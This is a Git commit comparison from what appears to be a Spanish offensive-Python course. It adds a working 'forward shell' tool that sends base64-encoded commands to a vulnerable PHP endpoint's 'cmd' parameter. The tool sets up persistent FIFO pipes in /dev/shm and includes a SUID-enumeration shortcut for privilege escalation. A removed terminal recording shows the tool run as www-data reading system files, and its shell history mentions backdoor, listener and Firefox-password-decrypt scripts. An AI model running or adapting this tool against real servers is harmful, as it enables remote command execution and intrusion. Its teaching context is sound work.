manuelver/Curso-lenguaje-python
1
0
Fork 0
Code Issues Pull Requests Releases Activity

Compare commits

base: manuelver:5d7e3302c5feae15c030a6190ef809f0ca047d30
Branches Tags
manuelver:main
...
compare: manuelver:d7252c6782d4eab1eb48f3db0ecbd3d1d3f46a5a
Branches Tags
manuelver:main

2 Commits
5d7e3302c5 ... d7252c6782

Author SHA1 Message Date
Manuel Vergara
d7252c6782 Update forwardshell script 2024-02-03 12:28:27 +01:00
Manuel Vergara
d4c5d8a50f wip 2024-02-03 12:27:47 +01:00
3 changed files with 154 additions and 190 deletions
Expand all files Collapse all files

130
python-ofensivo/15_hacking/12_fs/script/forwardshell.py
View File

@@ -11,24 +11,32 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output
""" """
import requests import requests
import signal import time
import sys
from termcolor import colored from termcolor import colored
from base64 import b64encode from base64 import b64encode
from random import randrange
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
signal.signal(signal.SIGINT, def_handler) class ForwardShell:
main_url = "http://localhost/index.php" def __init__(self):
session = randrange(100000, 999999)
def run_command(command): self.main_url = "http://localhost/index.php"
self.stdin = f"/dev/shm/{session}.input"
self.stdout = f"/dev/shm/{session}.output"
self.help_options = {
'enum suid': 'FileSystem SUID Privileges Enumeration',
'help': 'Show this help panel',
}
self.is_pseudo_terminal = False
def run_command(self, command):
command = b64encode(command.encode()).decode() command = b64encode(command.encode()).decode()
@@ -36,16 +44,112 @@ def run_command(command):
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
} }
r = requests.get(main_url, params=data) try:
r = requests.get(self.main_url, params=data, timeout=5)
return r.text return r.text
except:
pass
if __name__ == '__main__': return None
def write_stdin(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin)
}
r = requests.get(self.main_url, params=data)
def read_stdout(self):
for _ in range(5):
read_stdout_command = f"/bin/cat {self.stdout}"
output_command = self.run_command(read_stdout_command)
time.sleep(0.2)
return output_command
def setup_shell(self):
command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
self.run_command(command)
def remove_data(self):
remove_data_command = f"/bin/rm {self.stdin} {self.stdout}"
self.run_command(remove_data_command)
def clear_stdout(self):
clear_stdout_command = f"echo '' > {self.stdout}"
self.run_command(clear_stdout_command)
def run(self) -> None:
self.setup_shell()
while True: while True:
command = input(colored("> ", "yellow")) command = input(colored("> ", "yellow"))
output_command = run_command(command)
if "script /dev/null -c bash" in command:
print(
colored("[+] Se ha iniciado una pseudo-terminal", "blue"))
self.is_pseudo_terminal = True
if command.strip() == "enum suid":
command = f"find / -perm -4000 2>/dev/null | xargs ls -l"
if command.strip() == "help":
print(colored(f"\n[+] Listando panel de ayuda:\n", "blue"))
for key, value in self.help_options.items():
print(f"\t{key} - {value}")
continue
self.write_stdin(command + "\n")
output_command = self.read_stdout()
if command.strip() == "exit":
self.is_pseudo_terminal = False
print(colored("[+] Se ha cerrado la pseudo-terminal", "blue"))
self.clear_stdout()
continue
if self.is_pseudo_terminal:
lines = output_command.split("\n")
if len(lines) == 1:
cleared_output = '\n'.join([lines[-1]] + lines[:1])
elif len(lines) > 1:
cleared_output = '\n'.join(
[lines[-1]] + lines[:1] + lines[2:-1])
else:
print(len(lines))
print(lines)
print(cleared_output + "\n")
else:
print(output_command) print(output_command)
self.clear_stdout()

29
python-ofensivo/15_hacking/12_fs/script/main.py Normal file
View File

@@ -0,0 +1,29 @@
#!/usr/bin/env python3
"""
Fichero principal de la aplicación.
"""
import signal
import sys
from forwardshell import ForwardShell
from termcolor import colored
def def_handler(sig, frame) -> None:
print(colored("\n[!] Exiting...", "blue"))
my_forward_shell.remove_data()
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
if __name__ == '__main__':
my_forward_shell = ForwardShell()
my_forward_shell.run()

169
python-ofensivo/15_hacking/12_fs/typescript
View File

@@ -1,169 +0,0 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]


7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%


🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l
 script/[?25h
]2;script/]1;script/%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l
 #!/usr/bin/env python3[?25h
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l
 code forwardshell.py[?25h
]2;code forwardshell.py]1;code%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C